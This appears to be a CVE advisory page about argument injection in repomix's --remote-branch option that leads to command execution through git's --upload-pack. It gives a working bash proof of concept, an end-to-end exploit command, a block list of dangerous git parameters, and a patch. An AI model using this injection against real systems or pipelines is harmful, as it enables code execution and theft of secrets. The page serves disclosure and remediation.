Listen to this Post
The `–remote-branch` CLI option in repomix is vulnerable to argument injection (CWE-88). User-supplied input is passed directly to `git fetch` and `git checkout` subprocesses via `child_process.execFileAsync` without sanitization, `–` delimiters, or validation. An attacker can inject arbitrary git command-line options. By injecting the `–upload-pack` option and specifying an SSH (git@...) or local (file://) remote URL, an attacker achieves arbitrary command execution with the privileges of the user running repomix. This bypasses the existing `dangerousParams` blocklist implemented in validateGitUrl().
The vulnerable code resides in src/core/git/gitCommand.ts. The `remoteBranch` parameter is appended directly to the arguments array for git subprocesses without the `–` positional delimiter. Sink 1 (Lines 118-127): await deps.execFileAsync('git', ['-C', directory, 'fetch', '--depth', '1', 'origin', remoteBranch], gitRemoteOpts);. Sink 2 (Lines 148-151): await deps.execFileAsync('git', ['-C', directory, 'checkout', remoteBranch]);. The application attempts to prevent this exact vulnerability class by blocking dangerous parameters (--upload-pack, --receive-pack, --config, --exec) within the `validateGitUrl` function. However, this validation is exclusively applied to the `url` variable and omitted for remoteBranch, creating a direct bypass.
The attack flow is:
`repomix --remote-branch <injected_option>` → `src/cli/actions/remoteAction.ts:226` (cloneRepository) → `src/core/git/gitCommand.ts:118` (execGitShallowClone) → [bash] `execFileAsync('git', ['...', 'origin', '--upload-pack=/tmp/payload'])` → [bash] git invokes the payload binary via transport helper. Execution occurs prior to git protocol validation. The script executes successfully despite the fetch operation returning a 128 exit code.
<h2 style="color: blue;">DailyCVE Form:</h2>
Platform: Repomix
Version: <1.14.1
Vulnerability: Argument Injection
Severity: High (8.8)
date: 2026-05-18
<h2 style="color: blue;">Prediction: 2026-05-27</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">Analytics:</h2>
<ul>
<li>Attack Vector: Remote</li>
<li>Privileges Required: None</li>
<li>User Interaction: Required</li>
<li>CVSS Score: 8.8</li>
</ul>
<h2 style="color: blue;">Bash Commands & Codes:</h2>
[bash]
Create payload
cat > /tmp/malicious-pack << 'EOF'
!/bin/bash
echo "=== RCE EXECUTED ===" > /tmp/repomix-pwned.txt
id >> /tmp/repomix-pwned.txt
EOF
chmod +x /tmp/malicious-pack
Trigger vulnerability
git init --bare /tmp/dummy-remote.git
mkdir /tmp/test-fetch && cd /tmp/test-fetch
git init
git remote add origin file:///tmp/dummy-remote.git
git fetch --upload-pack=/tmp/malicious-pack origin 2>&1
Verify execution
cat /tmp/repomix-pwned.txt
End-to-End Exploit:
repomix --remote [email protected]:yamadashy/repomix.git --remote-branch '--upload-pack=/tmp/malicious-pack'
Exploit:
- Create an executable payload script that writes system execution context to a file.
- Establish a dummy remote and trigger the fetch operation, injecting the `–upload-pack` argument.
- The payload executes prior to git protocol validation, achieving arbitrary command execution with the privileges of the user running repomix.
Protection:
- Primary Fix: Append the `–` delimiter to explicitly separate options from positional arguments in all git subprocess calls utilizing
remoteBranch.await deps.execFileAsync( 'git', ['-C', directory, 'fetch', '--depth', '1', 'origin', '--', remoteBranch], gitRemoteOpts, );
- Defense in Depth: Update `execGitShallowClone` to validate `remoteBranch` against the existing `dangerousParams` array.
const dangerousParams = ['--upload-pack', '--receive-pack', '--config', '--exec']; if (remoteBranch && dangerousParams.some((param) => remoteBranch.includes(param))) { throw new RepomixError(<code>Invalid branch name. Contains potentially dangerous parameters: ${remoteBranch}</code>); } - Upgrade to repomix v1.14.1 or later.
Impact:
- Remote Code Execution: Complete system compromise with the privileges of the user executing repomix.
- CI/CD Compromise: If repomix is utilized in automated pipelines where `–remote-branch` is populated by external triggers (e.g., webhook payloads, PR s), attackers can compromise build servers and exfiltrate secrets.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

